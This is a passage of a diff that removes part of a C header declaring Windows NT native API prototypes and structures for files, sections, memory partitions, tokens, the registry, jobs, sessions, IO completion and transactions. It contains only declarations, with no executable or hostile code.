-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetEaFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_bytecount_(Length) PVOID Buffer,
- _In_ ULONG Length);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryVolumeInformationFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID FsInformation,
- _In_ ULONG Length,
- _In_ FS_INFORMATION_CLASS FsInformationClass);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryQuotaInformationFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_ BOOLEAN ReturnSingleEntry,
- _In_reads_bytes_opt_(SidListLength) PVOID SidList,
- _In_ ULONG SidListLength,
- _In_opt_ PSID StartSid,
- _In_ BOOLEAN RestartScan);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetQuotaInformationFile(
- _In_ HANDLE FileHandle,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_reads_bytes_(Length) PVOID Buffer,
- _In_ ULONG Length);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReadFileScatter(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ PFILE_SEGMENT_ELEMENT SegmentArray,
- _In_ ULONG Length,
- _In_opt_ PLARGE_INTEGER ByteOffset,
- _In_opt_ PULONG Key);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWriteFileGather(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ PFILE_SEGMENT_ELEMENT SegmentArray,
- _In_ ULONG Length,
- _In_opt_ PLARGE_INTEGER ByteOffset,
- _In_opt_ PULONG Key);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryDirectoryFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID FileInformation,
- _In_ ULONG Length,
- _In_ FILE_INFORMATION_CLASS FileInformationClass,
- _In_ BOOLEAN ReturnSingleEntry,
- _In_opt_ PUNICODE_STRING FileName,
- _In_ BOOLEAN RestartScan);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtNotifyChangeDirectoryFile(
- _In_ HANDLE FileHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _Out_writes_bytes_(Length) PVOID Buffer,
- _In_ ULONG Length,
- _In_ ULONG CompletionFilter,
- _In_ BOOLEAN WatchTree);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtLoadDriver(
- _In_ PUNICODE_STRING DriverServiceName);
-
-NTSYSAPI
-NTSTATUS
-NTAPI NtUnloadDriver(
- _In_ PUNICODE_STRING DriverServiceName);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtLoadHotPatch(
- _In_ PUNICODE_STRING HotPatchName,
- _Reserved_ ULONG LoadFlag);
-
-/************************************************************************************
-*
-* Section API (+MemoryPartitions).
-*
-************************************************************************************/
-
-typedef enum _MEMORY_PARTITION_INFORMATION_CLASS {
- SystemMemoryPartitionInformation,
- SystemMemoryPartitionMoveMemory,
- SystemMemoryPartitionAddPagefile,
- SystemMemoryPartitionCombineMemory,
- SystemMemoryPartitionInitialAddMemory,
- SystemMemoryPartitionGetMemoryEvents,
- SystemMemoryPartitionMax
-} MEMORY_PARTITION_INFORMATION_CLASS;
-
-typedef struct _MEMORY_PARTITION_PAGE_RANGE {
- ULONG_PTR StartPage;
- ULONG_PTR NumberOfPages;
-} MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE;
-
-typedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION {
- ULONG Flags;
- ULONG NumberOfRanges;
- ULONG_PTR NumberOfPagesAdded;
- MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1];
-} MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION;
-
-typedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION {
- PVOID StopHandle;
- ULONG Flags;
- ULONG_PTR TotalNumberOfPages;
-} MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION;
-
-typedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION {
- UNICODE_STRING PageFileName;
- LARGE_INTEGER MinimumSize;
- LARGE_INTEGER MaximumSize;
- ULONG Flags;
-} MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION;
-
-typedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION {
- ULONG_PTR NumberOfPages;
- ULONG NumaNode;
- ULONG Flags;
-} MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION;
-
-typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {
- ULONG Flags;
- ULONG NumaNode;
- ULONG Channel;
- ULONG NumberOfNumaNodes;
- ULONG_PTR ResidentAvailablePages;
- ULONG_PTR CommittedPages;
- ULONG_PTR CommitLimit;
- ULONG_PTR PeakCommitment;
- ULONG_PTR TotalNumberOfPages;
- ULONG_PTR AvailablePages;
- ULONG_PTR ZeroPages;
- ULONG_PTR FreePages;
- ULONG_PTR StandbyPages;
-} MEMORY_PARTITION_CONFIGURATION_INFORMATION, *PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateSection(
- _Out_ PHANDLE SectionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_opt_ PLARGE_INTEGER MaximumSize,
- _In_ ULONG SectionPageProtection,
- _In_ ULONG AllocationAttributes,
- _In_opt_ HANDLE FileHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenSection(
- _Out_ PHANDLE SectionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtMapViewOfSection(
- _In_ HANDLE SectionHandle,
- _In_ HANDLE ProcessHandle,
- _Inout_ PVOID *BaseAddress,
- _In_ ULONG_PTR ZeroBits,
- _In_ SIZE_T CommitSize,
- _Inout_opt_ PLARGE_INTEGER SectionOffset,
- _Inout_ PSIZE_T ViewSize,
- _In_ SECTION_INHERIT InheritDisposition,
- _In_ ULONG AllocationType,
- _In_ ULONG Win32Protect);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQuerySection(
- _In_ HANDLE SectionHandle,
- _In_ SECTION_INFORMATION_CLASS SectionInformationClass,
- _Out_ PVOID SectionInformation,
- _In_ SIZE_T SectionInformationLength,
- _Out_opt_ PSIZE_T ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtUnmapViewOfSection(
- _In_ HANDLE ProcessHandle,
- _In_ PVOID BaseAddress);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtUnmapViewOfSectionEx(
- _In_ HANDLE ProcessHandle,
- _In_opt_ PVOID BaseAddress,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtExtendSection(
- _In_ HANDLE SectionHandle,
- _Inout_ PLARGE_INTEGER NewSectionSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtMapUserPhysicalPages(
- _In_ PVOID VirtualAddress,
- _In_ ULONG_PTR NumberOfPages,
- _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtMapUserPhysicalPagesScatter(
- _In_reads_(NumberOfPages) PVOID *VirtualAddresses,
- _In_ ULONG_PTR NumberOfPages,
- _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAllocateUserPhysicalPages(
- _In_ HANDLE ProcessHandle,
- _Inout_ PULONG_PTR NumberOfPages,
- _Out_writes_(*NumberOfPages) PULONG_PTR UserPfnArray);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFreeUserPhysicalPages(
- _In_ HANDLE ProcessHandle,
- _Inout_ PULONG_PTR NumberOfPages,
- _In_reads_(*NumberOfPages) PULONG_PTR UserPfnArray);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenPartition(
- _Out_ PHANDLE PartitionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtManagePartition(
- _In_ HANDLE TargetHandle,
- _In_opt_ HANDLE SourceHandle,
- _In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
- _In_ PVOID PartitionInformation,
- _In_ ULONG PartitionInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreatePartition(
- _Out_ PHANDLE PartitionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ ULONG PreferredNode);
-
-/************************************************************************************
-*
-* Token API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAccessCheck(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _In_ HANDLE ClientToken,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ PGENERIC_MAPPING GenericMapping,
- _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,
- _Inout_ PULONG PrivilegeSetLength,
- _Out_ PACCESS_MASK GrantedAccess,
- _Out_ PNTSTATUS AccessStatus);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAccessCheckByType(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _In_opt_ PSID PrincipalSelfSid,
- _In_ HANDLE ClientToken,
- _In_ ACCESS_MASK DesiredAccess,
- _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,
- _In_ ULONG ObjectTypeListLength,
- _In_ PGENERIC_MAPPING GenericMapping,
- _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,
- _Inout_ PULONG PrivilegeSetLength,
- _Out_ PACCESS_MASK GrantedAccess,
- _Out_ PNTSTATUS AccessStatus);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAccessCheckByTypeResultList(
- _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
- _In_opt_ PSID PrincipalSelfSid,
- _In_ HANDLE ClientToken,
- _In_ ACCESS_MASK DesiredAccess,
- _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,
- _In_ ULONG ObjectTypeListLength,
- _In_ PGENERIC_MAPPING GenericMapping,
- _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,
- _Inout_ PULONG PrivilegeSetLength,
- _Out_writes_(ObjectTypeListLength) PACCESS_MASK GrantedAccess,
- _Out_writes_(ObjectTypeListLength) PNTSTATUS AccessStatus);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenProcessToken(
- _In_ HANDLE ProcessHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _Out_ PHANDLE TokenHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenProcessTokenEx(
- _In_ HANDLE ProcessHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ ULONG HandleAttributes,
- _Out_ PHANDLE TokenHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDuplicateToken(
- _In_ HANDLE ExistingTokenHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ BOOLEAN EffectiveOnly,
- _In_ TOKEN_TYPE TokenType,
- _Out_ PHANDLE NewTokenHandle);
-
-#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
-#define SANDBOX_INERT 0x2 // winnt
-#define LUA_TOKEN 0x4
-#define WRITE_RESTRICT 0x8
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFilterToken(
- _In_ HANDLE ExistingTokenHandle,
- _In_ ULONG Flags,
- _In_opt_ PTOKEN_GROUPS SidsToDisable,
- _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
- _In_opt_ PTOKEN_GROUPS RestrictedSids,
- _Out_ PHANDLE NewTokenHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtImpersonateAnonymousToken(
- _In_ HANDLE ThreadHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryInformationToken(
- _In_ HANDLE TokenHandle,
- _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
- _Out_writes_bytes_(TokenInformationLength) PVOID TokenInformation,
- _In_ ULONG TokenInformationLength,
- _Out_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationToken(
- _In_ HANDLE TokenHandle,
- _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
- _In_reads_bytes_(TokenInformationLength) PVOID TokenInformation,
- _In_ ULONG TokenInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenThreadToken(
- _In_ HANDLE ThreadHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ BOOLEAN OpenAsSelf,
- _Out_ PHANDLE TokenHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenThreadTokenEx(
- _In_ HANDLE ThreadHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ BOOLEAN OpenAsSelf,
- _In_ ULONG HandleAttributes,
- _Out_ PHANDLE TokenHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAdjustPrivilegesToken(
- _In_ HANDLE TokenHandle,
- _In_ BOOLEAN DisableAllPrivileges,
- _In_opt_ PTOKEN_PRIVILEGES NewState,
- _In_ ULONG BufferLength,
- _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
- _Out_ _When_(PreviousState == NULL, _Out_opt_) PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAdjustGroupsToken(
- _In_ HANDLE TokenHandle,
- _In_ BOOLEAN ResetToDefault,
- _In_opt_ PTOKEN_GROUPS NewState,
- _In_opt_ ULONG BufferLength,
- _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_GROUPS PreviousState,
- _Out_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCompareTokens(
- _In_ HANDLE FirstTokenHandle,
- _In_ HANDLE SecondTokenHandle,
- _Out_ PBOOLEAN Equal);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtPrivilegeCheck(
- _In_ HANDLE ClientToken,
- _Inout_ PPRIVILEGE_SET RequiredPrivileges,
- _Out_ PBOOLEAN Result);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateToken(
- _Out_ PHANDLE TokenHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ TOKEN_TYPE TokenType,
- _In_ PLUID AuthenticationId,
- _In_ PLARGE_INTEGER ExpirationTime,
- _In_ PTOKEN_USER User,
- _In_ PTOKEN_GROUPS Groups,
- _In_ PTOKEN_PRIVILEGES Privileges,
- _In_opt_ PTOKEN_OWNER Owner,
- _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,
- _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,
- _In_ PTOKEN_SOURCE TokenSource);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateTokenEx(
- _Out_ PHANDLE TokenHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ TOKEN_TYPE TokenType,
- _In_ PLUID AuthenticationId,
- _In_ PLARGE_INTEGER ExpirationTime,
- _In_ PTOKEN_USER User,
- _In_ PTOKEN_GROUPS Groups,
- _In_ PTOKEN_PRIVILEGES Privileges,
- _In_opt_ PVOID UserAttributes, // points to TOKEN_SECURITY_ATTRIBUTES_INFORMATION
- _In_opt_ PVOID DeviceAttributes, // points to PTOKEN_SECURITY_ATTRIBUTES_INFORMATION
- _In_opt_ PTOKEN_GROUPS DeviceGroups,
- _In_opt_ PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy,
- _In_opt_ PTOKEN_OWNER Owner,
- _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,
- _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,
- _In_ PTOKEN_SOURCE TokenSource);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateLowBoxToken(
- _Out_ PHANDLE TokenHandle,
- _In_ HANDLE ExistingTokenHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ PSID PackageSid,
- _In_ ULONG CapabilityCount,
- _In_reads_opt_(CapabilityCount) PSID_AND_ATTRIBUTES Capabilities,
- _In_ ULONG HandleCount,
- _In_reads_opt_(HandleCount) HANDLE *Handles);
-
-/************************************************************************************
-*
-* Registry API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateKey(
- _Out_ PHANDLE KeyHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Reserved_ ULONG TitleIndex,
- _In_opt_ PUNICODE_STRING Class,
- _In_ ULONG CreateOptions,
- _Out_opt_ PULONG Disposition);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateKeyTransacted(
- _Out_ PHANDLE KeyHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _Reserved_ ULONG TitleIndex,
- _In_opt_ PUNICODE_STRING Class,
- _In_ ULONG CreateOptions,
- _In_ HANDLE TransactionHandle,
- _Out_opt_ PULONG Disposition);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenKey(
- _Out_ PHANDLE KeyHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenKeyEx(
- _Out_ PHANDLE KeyHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ ULONG OpenOptions);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenKeyTransacted(
- _Out_ PHANDLE KeyHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ HANDLE TransactionHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenKeyTransactedEx(
- _Out_ PHANDLE KeyHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ ULONG OpenOptions,
- _In_ HANDLE TransactionHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryKey(
- _In_ HANDLE KeyHandle,
- _In_ KEY_INFORMATION_CLASS KeyInformationClass,
- _Out_writes_bytes_opt_(Length) PVOID KeyInformation,
- _In_ ULONG Length,
- _Out_ PULONG ResultLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtEnumerateKey(
- _In_ HANDLE KeyHandle,
- _In_ ULONG Index,
- _In_ KEY_INFORMATION_CLASS KeyInformationClass,
- _Out_writes_bytes_opt_(Length) PVOID KeyInformation,
- _In_ ULONG Length,
- _Out_ PULONG ResultLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtEnumerateValueKey(
- _In_ HANDLE KeyHandle,
- _In_ ULONG Index,
- _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
- _Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,
- _In_ ULONG Length,
- _Out_ PULONG ResultLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryValueKey(
- _In_ HANDLE KeyHandle,
- _In_ PUNICODE_STRING ValueName,
- _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
- _Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,
- _In_ ULONG Length,
- _Out_ PULONG ResultLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryMultipleValueKey(
- _In_ HANDLE KeyHandle,
- _Inout_updates_(EntryCount) PKEY_VALUE_ENTRY ValueEntries,
- _In_ ULONG EntryCount,
- _Out_writes_bytes_(*BufferLength) PVOID ValueBuffer,
- _Inout_ PULONG BufferLength,
- _Out_opt_ PULONG RequiredBufferLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetValueKey(
- _In_ HANDLE KeyHandle,
- _In_ PUNICODE_STRING ValueName,
- _In_opt_ ULONG TitleIndex,
- _In_ ULONG Type,
- _In_reads_bytes_opt_(DataSize) PVOID Data,
- _In_ ULONG DataSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDeleteKey(
- _In_ HANDLE KeyHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDeleteValueKey(
- _In_ HANDLE KeyHandle,
- _In_ PUNICODE_STRING ValueName);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtRenameKey(
- _In_ HANDLE KeyHandle,
- _In_ PUNICODE_STRING NewName);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationKey(
- _In_ HANDLE KeyHandle,
- _In_ KEY_SET_INFORMATION_CLASS KeySetInformationClass,
- _In_reads_bytes_(KeySetInformationLength) PVOID KeySetInformation,
- _In_ ULONG KeySetInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFlushKey(
- _In_ HANDLE KeyHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCompressKey(
- _In_ HANDLE Key);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtLoadKey(
- _In_ POBJECT_ATTRIBUTES TargetKey,
- _In_ POBJECT_ATTRIBUTES SourceFile);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtLoadKey2(
- _In_ POBJECT_ATTRIBUTES TargetKey,
- _In_ POBJECT_ATTRIBUTES SourceFile,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtLoadKeyEx(
- _In_ POBJECT_ATTRIBUTES TargetKey,
- _In_ POBJECT_ATTRIBUTES SourceFile,
- _In_ ULONG Flags,
- _In_opt_ HANDLE TrustClassKey,
- _In_opt_ HANDLE Event,
- _In_opt_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE RootHandle,
- _Out_opt_ PIO_STATUS_BLOCK IoStatus);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSaveKey(
- _In_ HANDLE KeyHandle,
- _In_ HANDLE FileHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSaveKeyEx(
- _In_ HANDLE KeyHandle,
- _In_ HANDLE FileHandle,
- _In_ ULONG Format);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtUnloadKey(
- _In_ POBJECT_ATTRIBUTES TargetKey);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtUnloadKey2(
- _In_ POBJECT_ATTRIBUTES TargetKey,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtUnloadKeyEx(
- _In_ POBJECT_ATTRIBUTES TargetKey,
- _In_opt_ HANDLE Event);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtNotifyChangeKey(
- _In_ HANDLE KeyHandle,
- _In_opt_ HANDLE Event,
- _In_opt_ PIO_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG CompletionFilter,
- _In_ BOOLEAN WatchTree,
- _Out_writes_bytes_opt_(BufferSize) PVOID Buffer,
- _In_ ULONG BufferSize,
- _In_ BOOLEAN Asynchronous);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtLockRegistryKey(
- _In_ HANDLE KeyHandle);
-
-/************************************************************************************
-*
-* Job API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAssignProcessToJobObject(
- _In_ HANDLE JobHandle,
- _In_ HANDLE ProcessHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateJobObject(
- _Out_ PHANDLE JobHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateJobSet(
- _In_ ULONG NumJob,
- _In_reads_(NumJob) PJOB_SET_ARRAY UserJobSet,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtIsProcessInJob(
- _In_ HANDLE ProcessHandle,
- _In_opt_ HANDLE JobHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenJobObject(
- _Out_ PHANDLE JobHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryInformationJobObject(
- _In_opt_ HANDLE JobHandle,
- _In_ JOBOBJECTINFOCLASS JobObjectInformationClass,
- _Out_writes_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,
- _In_ ULONG JobObjectInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationJobObject(
- _In_ HANDLE JobHandle,
- _In_ JOBOBJECTINFOCLASS JobObjectInformationClass,
- _In_reads_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,
- _In_ ULONG JobObjectInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtTerminateJobObject(
- _In_ HANDLE JobHandle,
- _In_ NTSTATUS ExitStatus);
-
-/************************************************************************************
-*
-* Session API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenSession(
- _Out_ PHANDLE SessionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-/************************************************************************************
-*
-* IO Completion API.
-*
-************************************************************************************/
-
-typedef enum _IO_COMPLETION_INFORMATION_CLASS {
- IoCompletionBasicInformation
-} IO_COMPLETION_INFORMATION_CLASS;
-
-typedef struct _IO_COMPLETION_BASIC_INFORMATION {
- LONG Depth;
-} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateIoCompletion(
- _Out_ PHANDLE IoCompletionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_opt_ ULONG Count);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenIoCompletion(
- _Out_ PHANDLE IoCompletionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryIoCompletion(
- _In_ HANDLE IoCompletionHandle,
- _In_ IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,
- _Out_writes_bytes_(IoCompletionInformationLength) PVOID IoCompletionInformation,
- _In_ ULONG IoCompletionInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetIoCompletion(
- _In_ HANDLE IoCompletionHandle,
- _In_opt_ PVOID KeyContext,
- _In_opt_ PVOID ApcContext,
- _In_ NTSTATUS IoStatus,
- _In_ ULONG_PTR IoStatusInformation);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetIoCompletionEx(
- _In_ HANDLE IoCompletionHandle,
- _In_ HANDLE IoCompletionPacketHandle,
- _In_opt_ PVOID KeyContext,
- _In_opt_ PVOID ApcContext,
- _In_ NTSTATUS IoStatus,
- _In_ ULONG_PTR IoStatusInformation);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtRemoveIoCompletion(
- _In_ HANDLE IoCompletionHandle,
- _Out_ PVOID *KeyContext,
- _Out_ PVOID *ApcContext,
- _Out_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_opt_ PLARGE_INTEGER Timeout);
-
-/************************************************************************************
-*
-* Transactions API.
-*
-************************************************************************************/
-
-//TmTx
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateTransaction(
- _Out_ PHANDLE TransactionHandle,
